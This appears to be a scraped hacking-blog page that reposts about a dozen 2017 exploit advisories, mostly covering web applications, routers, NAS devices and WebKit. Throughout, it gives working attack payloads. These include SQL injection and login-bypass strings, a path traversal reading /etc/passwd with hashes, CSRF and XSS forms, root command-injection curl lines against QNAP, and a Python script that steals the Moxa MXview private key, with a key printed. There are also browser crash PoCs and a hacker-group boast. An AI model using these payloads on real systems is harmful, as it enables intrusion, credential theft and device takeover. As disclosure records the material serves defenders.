# # # # #
# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
# Demo: https://xlinesoft.com/livedemo/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863164652
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/demos.shtml
# Demo: http://www.mygamingladder.com/upgrade/combo/
# Version: 7.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/game.php?gameid=[SQL]
# http://localhost/[PATH]/news.php?newsid=[SQL]
# http://localhost/[PATH]/teams.php?teamid=[SQL]
# http://localhost/[PATH]/match.php?matchid=[SQL]
# staff
# staffaccess
# staffcomments
# teammembers
# teammembersinv
# teams
# # # # #
# # # # #
# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/ladder.shtml
# Demo: http://www.ladder.tf2.co.za/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news.php?faqid=[SQL]
# staff :id
# staff :displayname
# staff :pass
# staff :email
# staff :title
# staff :access
# staff :contact
# # # # #
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)
<!--
Details
================
Software: WordPress Firewall 2
Version: 1.3
Homepage: https://wordpress.org/plugins/wordpress-firewall-2/
Advisory report: https://security.dxw.com/advisories/csrfstored-xss-in-wordpress-firewall-2-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can
Vulnerability
================
HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
Proof of concept
================
Visit the following page, click on the submit button, then visit the plugin’s options page:
-->
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php\">
<input type=\"text\" name=\"email_address\" value=\""><script>alert(1)</script>\">
<input type=\"text\" name=\"set_email\" value=\"Set Email\">
<input type=\"submit\">
</form>
<!--
In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2016-12-23: Discovered
2017-03-16: Reported to vendor by email
2017-04-04: Vendor could not be contacted
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
QNAP QTS multiple RCE vulnerabilities
=====================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
Overview
--------
QNAP QTS firmware contains multiple Command Injection (CWE-77)
vulnerabilities that can be exploited to gain remote command execution
on the devices.
Description
-----------
QNAP QTS web user interface CGI binaries include Command Injection
(CWE-77) vulnerabilities. An unauthenticated attacker can execute
arbitrary commands on the targeted device.
Impact
------
The attacker is able to execute arbitrary commands as administrative user
(root). The attacker has full access to all content on the targeted
device, and can read, modify or remove content at will.
Details
-------
The discovered vulnerabilities, described in more detail below, enable
multiple independent attacks described here in brief:
- Unauthenticated Remote Command Execution
The unauthenticated attacker can perform HTTP requests that exploit
the vulnerability to execute arbitrary commands. If the device is
connected to the internet, the vulnerable devices can be taken over in
an automated fashion and can then be used for further attacks.
- Authenticated Remote Command Execution
The authenticated attacker can perform HTTP requests that exploit
the vulnerabilities to execute arbitrary commands. This gives users
that normally have only restricted access to the device full
administrative (root) access to the system and access to all data
stored on the device regardless of the specified access limitations.
Vulnerabilities
---------------
1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
/cgi-bin/authLogin.cgi CGI has a command injection bug. The
following commands are executed via system():
/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
request GET parameter.
The reboot_notice_msg is a base64 encoded message of form:
QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
- TTTTTTTT is the unix time stamp (last 8 digits)
- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
- LLLL is the payload length
- PAYLOAD is the payload contents (LLLL bytes)
By creating a crafted reboot_notice_msg value, arbitrary commands
can be executed. For example:
QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<command>Disconnect</command>
<payload>`(echo;id)>&2`</payload>
</QDocRoot>
$
2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
command is executed via popen():
/sbin/cloud_util -r %s 2>/dev/null
The value inserted to %s is obtained from the `hash' HTTP request GET
parameter.
An authenticated user can use a specially crafted hash parameter to execute
arbitrary commands as root:
$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 22:55:48 GMT
Transfer-Encoding: chunked
Content-Type: text/plain
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
Content-type: text/html; charset="UTF-8"
Usage:
/sbin/cloud_util -r [enc_token]
$
3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
following commands are executed via system():
/bin/kill -9 %s
The value inserted to %s is obtained from the `pid' HTTP request GET
parameter.
An authenticated user can use a specially crafted pid parameter to execute
arbitrary commands as root:
$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
[~] # cat /tmp/pwned
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
[~] #
Vulnerable devices
------------------
The vulnerabilities were discovered from an QNAP TVS-663, firmware version
4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
Build 20170213.
CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
20161028.
It is believed that these vulnerabilities affect all devices running QTS.
Recommendations to vendor
-------------------------
1. Fix the command injection vulnerabilities by performing proper input
validation (whitelisting) and/or shell metacharacter escaping, or by
utilizing execl family of functions.
End user mitigation
-------------------
- Install the firmware update version 4.2.4 build 20170313 or later.
OR
- Restrict access to the web user interface (ports 8080 and 443).
Credits
-------
The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
21.01.2017 discovered vulnerabilities 2 and 3
23.02.2017 discovered vulnerability 1
23.02.2017 reported vulnerability 1 to the vendor
26.02.2017 started to write a preliminary advisory
27.02.2017 sent the preliminary advisory to vendor and CERT-FI
27.02.2017 requested CVE-IDs from MITRE
28.02.2017 received CVE-IDs from MITRE
02.03.2017 inquired status from vendor contact
02.03.2017 vendor confirmed CVE-2017-6361
04.03.2017 vendor confirmed the other two vulnerabilities
13.03.2017 vendor communicated about a upcoming release fixing the vulns
14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
15.03.2017 sent update to CERT-FI
21.03.2017 vendor released NAS-201703-21 advisory:
https://www.qnap.com/en/support/con_show.php?cid=113
06.04.2017 public release of the advisory
<!--
==========================
Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
Author:Zhiyang Zeng
Product:
—————
e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
—————
Fix
—————
Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
—————
Summary
————
e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use
forged requests to make e107 download and install a plug-in provided by the attacker.
————
Timeline
———
2017-03-01 report to vendor
2017-03-02 GitHub commit to fix token missing
———
Reproduce:
==========
I just give a uninstall any plugins POC.
vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php
POC:
-->
<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
<input type="text" name="delete_tables" value="1">
<input type="text" name="delete_ipool" value="1">
<input type="text" name="delete_files" value="0">
<input type="text" name="uninstall_confirm" value="Confirm uninstall">
<input type="submit" name="submit">
</form>
<!--
Description:
I try to uninstall plugin gallery which id is 8.
visiting beyond POC page, you will find gallery plugin has been uninstalled success!
===========
-->
======
Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/
=======
Description
================
Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status
POC:
========
include in the page ,then attack will occur:
delete user:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">
active or disactive plugins:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
FIX:
==========
https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
<!--
=======
Software: CopySafe Web
version: <2.6
description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
========
Description
==========
CSRF in wordpress copysafe web allows attacker changes plugin settings
========
POC:
=======
-->
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
<input type="text" name= "admin_only" value="checked">
<input type="text" name="asps" value="">
<input type="text" name="upload_path" value="">
<input type="text" name="max_size" value="">
<input type="text" name="mode" value=“checked”>
<input type=“text” name="submit” value="Save Settings”>
<input type="submit”>
</form>
<!--
=========
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Fixed
=========
https://wordpress.org/plugins/wp-copysafe-web/ changelog ->2.6 realease
-->
----------------
Title = Jobscript4Web 4.5 - Authentication Bypass
Date = 8/4/2017
Soft = http://www.jobscript4web.com/index.html
liVE Demo = http://www.simplejobs.co.in/soft4u
---------------
AutHor = TurkCyberArmy
---------------
Bizler Turk siber ordusu bunyesinde goreve basladik. Dosta guven dusmana korku vermek icin geldik.
Kendimize ait isletim sistemlerimizle, programlama dillerimizle, kendimizin gelistirdigi yazilimlarimizla artik buradayiz.
Sanal alem kontrolumuz altindadir. Turk devletine ait tum sitelerimiz ve sistemlerimiz emin ellerdedir.
Bilin istedik !!!
Turk Siber Yildizlari.!
---------------
+ Exploitation Details +
---------------
HTTP://Path/soft4u/
user : ' or '2=2 password : ' or '2=2
---------------
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC
Vendor:
============
www.moxa.com
Product:
===========
MXview V2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
Vulnerability Type:
=============================
Remote Private Key Disclosure
CVE Reference:
==============
CVE-2017-7455
Security Issue:
================
MXview stores a copy of its web servers private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
Remote attackers can easily access/read this private key "mxview.key" file by making an HTTP GET request.
e.g.
curl -v http://VICTIM-IP:81/certs/mxview.key
* About to connect() to VICTIM-IP port 81
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> Host: VICTIM-IP:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
+CPTV6agBkYxe7Q=
-----END PRIVATE KEY-----
Exploit:
=========
import socket
print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'
IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)
print 'Enjoy ur private server key!\n'
print s.recv(512)
s.close()
Network Access:
===============
Remote
Severity:
=========
Critical
Disclosure Timeline:
===================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1119
This is somewhat similar to https://crbug.com/663476.
Here's a snippet of Container::replaceAllChildren.
while (RefPtr<Node> child = m_firstChild) {
removeBetween(nullptr, child->nextSibling(), *child);
notifyChildNodeRemoved(*this, *child);
}
If the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.
Tested on Safari 10.0.3(12602.4.8).
-->
<html>
<head>
</head>
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let inp = f.contentDocument.head.appendChild(document.createElement('input'));
let link = inp.appendChild(document.createElement('link'));
link.rel = 'stylesheet';
link.href = 'data:,aaaaazxczxczzxzcz';
let btn = f.contentDocument.body.appendChild(document.createElement('button'));
btn.id = 'btn';
btn.onfocus = () => {
btn.onfocus = null;
window.g = inp.appendChild(document.createElement('iframe'));
window.g.onload = () => {
window.g.onload = null;
window.g.src = 'javascript:alert(location)';
let xml = `
<svg xmlns="http://www.w3.org/2000/svg">
<script>
document.documentElement.appendChild(parent.g);
</sc` + `ript>
<element a="1" a="2" />
</svg>`;
let h = document.body.appendChild(document.createElement('iframe'));
h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
};
window.g.src = 'https://abc.xyz/';
};
f.contentWindow.location.hash = 'btn';
inp.textContent = '';
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1101
Note: It seems it doesn't crash the JSC compiled without Address Sanitizer.
PoC:
-->
(function () {
for (var i = 0; i < 1000000; ++i) {
const v = Array & 1 ? v : 1;
typeof o <= 'object';
}
}());
<!--
Asan Log:
=================================================================
==32191==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000099738 at pc 0x000106c7af16 bp 0x700006a57850 sp 0x700006a57848
READ of size 8 at 0x607000099738 thread T20
==32191==AddressSanitizer: while reporting a bug found another one. Ignoring.
#0 0x106c7af15 in JSC::B3::Procedure::resetReachability() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4c7f15)
#1 0x106a1be8c in JSC::B3::generateToAir(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268e8c)
#2 0x106a1bd2f in JSC::B3::prepareForGeneration(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268d2f)
#3 0x107424312 in JSC::FTL::compile(JSC::FTL::State&, JSC::DFG::Safepoint::Result&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc71312)
#4 0x107232f3b in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7ff3b)
#5 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#6 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#7 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#8 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#9 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#10 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#11 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#12 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
0x607000099738 is located 72 bytes inside of 80-byte region [0x6070000996f0,0x607000099740)
freed by thread T20 here:
#0 0x1031d4cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x1080b073f in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fd73f)
#2 0x106c7d70d in JSC::B3::Procedure::deleteOrphans() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4ca70d)
#3 0x107439a98 in JSC::FTL::(anonymous namespace)::LowerDFGToB3::lower() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc86a98)
#4 0x10743889a in JSC::FTL::lowerDFGToB3(JSC::FTL::State&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc8589a)
#5 0x107232ee5 in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7fee5)
#6 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#7 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#8 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#9 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#10 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#11 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#12 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#13 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
previously allocated by thread T20 here:
#0 0x1031d4790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fffeb9062d9 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x22d9)
#2 0x1080ba154 in bmalloc::DebugHeap::malloc(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1907154)
#3 0x1080af4fb in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fc4fb)
#4 0x108046e95 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893e95)
#5 0x108046178 in WTF::fastMalloc(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893178)
#6 0x106a13b32 in JSC::B3::Value* JSC::B3::Procedure::add<JSC::B3::Value, JSC::B3::Opcode, JSC::B3::Type, JSC::B3::Origin>(JSC::B3::Opcode, JSC::B3::Type, JSC::B3::Origin) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x260b32)
#7 0x10743aa02 in JSC::FTL::(anonymous namespace)::LowerDFGToB3::createPhiVariables() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc87a02)
#8 0x107438f1d in JSC::FTL::(anonymous namespace)::LowerDFGToB3::lower() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc85f1d)
#9 0x10743889a in JSC::FTL::lowerDFGToB3(JSC::FTL::State&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc8589a)
#10 0x107232ee5 in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7fee5)
#11 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#12 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#13 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#14 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#15 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#16 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#17 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#18 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
Thread T20 created by T0 here:
#0 0x1031ca379 in wrap_pthread_create (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x41379)
#1 0x108097acb in WTF::createThreadInternal(void (*)(void*), void*, char const*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4acb)
#2 0x108097325 in WTF::createThread(char const*, std::__1::function<void ()>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4325)
#3 0x1080217fb in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x186e7fb)
#4 0x1073dc5c8 in JSC::DFG::Worklist::enqueue(WTF::PassRefPtr<JSC::DFG::Plan>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc295c8)
